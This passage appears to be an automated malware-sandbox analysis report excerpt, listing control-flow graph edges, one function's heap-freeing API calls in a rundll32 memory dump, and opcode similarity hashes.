56->84 57->33 57->88 58->0 59 Function_0559F094 60 Function_0565422B 60->44 60->54 60->78 61 Function_056574AB 61->20 62->40 62->41 62->43 62->46 62->51 62->89 63 Function_05666BB5 65 Function_056533B0 65->9 65->27 65->30 65->34 65->35 65->44 65->58 65->61 68 Function_0565E03E 65->68 65->92 93 Function_05657492 65->93 65->95 67 Function_0554E182 68->53 68->84 69 Function_05653139 69->13 70->56 70->91 71 Function_0565EF85 71->53 71->84 74 Function_0567DB05 75 Function_0564BC00 77 Function_0562E307 77->16 77->67 80->31 82 Function_0565B30E 82->28 82->53 83->31 84->45 86 Function_055A48B4 87 Function_05648C8B 88->13 88->69 88->70 88->91 90->8 90->49 90->57 91->12 91->19 91->22 91->42 91->44 91->56 91->71 91->87 91->95 92->76 92->82 94 Function_05600D9C 95->60 95->81

    Control-flow Graph

    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 05648BD8
      • Part of subcall function 05648EDB: __getptd_noexit.LIBCMT ref: 05648EDB
    • GetLastError.KERNEL32(00000000), ref: 05648BEA
    Memory Dump Source
    • Source File: 00000009.00000002.1369781048.0000000005531000.00000020.00001000.00020000.00000000.sdmp, Offset: 05530000, based on PE: true
    • Associated: 00000009.00000002.1369766836.0000000005530000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000009.00000002.1369863890.000000000568A000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000009.00000002.1370110589.0000000005AFD000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000009.00000002.1370128687.0000000005AFF000.00000040.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_5530000_rundll32.jbxd
    Similarity
    • API ID: ErrorFreeHeapLast__getptd_noexit
    • String ID:
    • API String ID: 269751013-0
    • Opcode ID: 160e48cf8d35cc82f16f894314be21b2c6df5086fe2ba25d7bdd5a369fdeb11a
    • Instruction ID: d7ed347e25a427f0ee3236cad9748fec02a5d4ddce777a5b106380e23bb42212
    • Opcode Fuzzy Hash: 160e48cf8d35cc82f16f894314be21b2c6df5086fe2ba25d7bdd5a369fdeb11a
    • Instruction Fuzzy Hash: F9E08C71100206ABCB116FE0A80DBAD3BD9BB10245F104028F60AC7150DE348182CB88